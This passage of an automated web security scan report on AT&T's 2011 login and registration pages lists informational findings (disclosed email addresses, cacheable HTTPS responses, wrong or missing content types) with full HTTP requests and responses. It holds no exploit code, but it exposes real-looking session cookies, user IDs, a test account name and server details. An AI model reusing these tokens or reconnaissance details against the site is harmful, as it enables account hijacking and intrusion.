Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:39:47 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A313761C71271071C2539E552188C3F4; path=/; domain=.att.com
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: EDOCSSESSIONID=h0BxN4pDq3BVSNCXR6bvvmwLZFpCpyHGBPHnzkcykGGYhNS2ycG9!-744530585; path=/
Set-Cookie: stack=doammw08; path=/
Set-Cookie: colam_ctn=l%3Den_US; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:39:47 GMT; path=/
Set-Cookie: stack=doammw08; path=/
Content-Length: 57599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...
Div").className = "";
   }

   //Below Code added to fix defect WUP00364204
   
   // ISSUE
   //If user login using wireline id qaywls_3212680090 and rememberme checkbox is checked
   //then while logout qaywls_3212680090@attworld.com is populated in user text box
   //In cookie qaywls_3212680090@attworld.com is treaded as uverse id (email)
   
   // code modified for the defect WUP00371849
   // Code modified for WUP00364204 defect
   var tGuardOn = document.loginActionForm.tGuardOn;
   var accountType = docum
...[SNIP]...
<div id="exampleUverse">(Example: john@att.net)</div>
...[SNIP]...

7.3. https://www.att.com/olam/registrationAction.olamexecute  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/registrationAction.olamexecute

Issue detail

The following email address was disclosed in the response:

Request

GET /olam/registrationAction.olamexecute HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie", no-store
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: -1
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:17 GMT
Connection: keep-alive
Set-Cookie: TLTHID=54B4862A712510717B51952E259E14A2; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=1Xg6N4lFf66p8RzjmLVH6cygD59mH6qmpXs0hM6Jx6LyFSZH2Llj!2022867730; path=/
Set-Cookie: browserid=A001533839947; domain=.att.com; expires=Thursday, 26-Apr-2012 23:23:17 GMT; path=/
Set-Cookie: stack=p1eam1m6; path=/
Content-Length: 31527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...
r wirelesss phone number can contain only numbers. Please verify that the phone number was entered correctly.";    

   map['MemberIDFormatErrorMessage'] = "Your U-verse member ID should be in this format: name@domain.com";    

   map['NumberOfCharactersBeforeTheAtSymbolInYourUverseMemberIDCannotBeMoreThan20'] = "The number of characters before the @ in your U-verse member ID cannot be more than 20.";    

   map['NumberOfChara
...[SNIP]...

8. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 530
Content-Type: text/html; charset=UTF-8
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2CLicense/0 ]
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:23:42 GMT
Connection: keep-alive
Set-Cookie: TLTHID=638F77867125107191D59E552188C3F4; path=/; domain=.att.com


<html>
   <body>
       <form name="myForm">
        <input type="hidden" name="userid" size="20" />
        <input type="hidden" name="passwor
...[SNIP]...

9. Content type incorrectly stated  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.att.com
Path:   /olam/images/attLoader.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /olam/images/attLoader.gif HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.a=1303946627047; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 5944
Content-Type: image/gif
Last-Modified: Thu, 17 Feb 2011 23:19:15 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:57 GMT
Connection: keep-alive

......JFIF.....H.H.....C......
........(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C......./../cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc......i...."..............................
...[SNIP]...

10. Content type is not specified  previous
There are 18 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. https://www.att.com/olam/js/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/AC_RunActiveContent.js

Request

GET /olam/js/AC_RunActiveContent.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 8029
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:15 GMT
Connection: keep-alive

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1)
...[SNIP]...

10.2. https://www.att.com/olam/js/ATT-Olam-english-mtagconfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/ATT-Olam-english-mtagconfig.js

Request

GET /olam/js/ATT-Olam-english-mtagconfig.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 4261
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:29 GMT
Connection: keep-alive

// Date last modified = 20090825
// Modified by = DC

var lpMTagConfig = {
"lpServer" : "sales.liveperson.net",
"lpNumber" : "76226072",
"lpProtocol" : (document.location.toS
...[SNIP]...

10.3. https://www.att.com/olam/js/Ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/Ajax.js

Request

GET /olam/js/Ajax.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5717
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:16 GMT
Connection: keep-alive

var req;
var elementToUpdate;

function retrieveURL(url, nameOfFormToPost, elementId) {
   //get the (form based) params to push up as part of the get request
//url = url + getFormAsString(nameOfFor
...[SNIP]...

10.4. https://www.att.com/olam/js/UserMessaging.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/UserMessaging.js

Request

GET /olam/js/UserMessaging.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 451
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:18 GMT
Connection: keep-alive

   
function updateUserMessaging(readMessage) {
var url="/olam/userMessageAction.olamexecute?readMessage=" + readMessage;
var form="userMessageActionForm";
retrieveURL(url, form, "userMessag
...[SNIP]...

10.5. https://www.att.com/olam/js/cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/cookie.js

Request

GET /olam/js/cookie.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 10476
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:38 GMT
Connection: keep-alive

// name - name of the cookie
// value - value of the cookie
// [expires] - expiration date of the cookie (defaults to end of current session)
// [path] - path for which the cookie is valid (defaults t
...[SNIP]...

10.6. https://www.att.com/olam/js/cssBrowserSelector.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/cssBrowserSelector.js

Request

GET /olam/js/cssBrowserSelector.js HTTP/1.1
Host: www.att.com
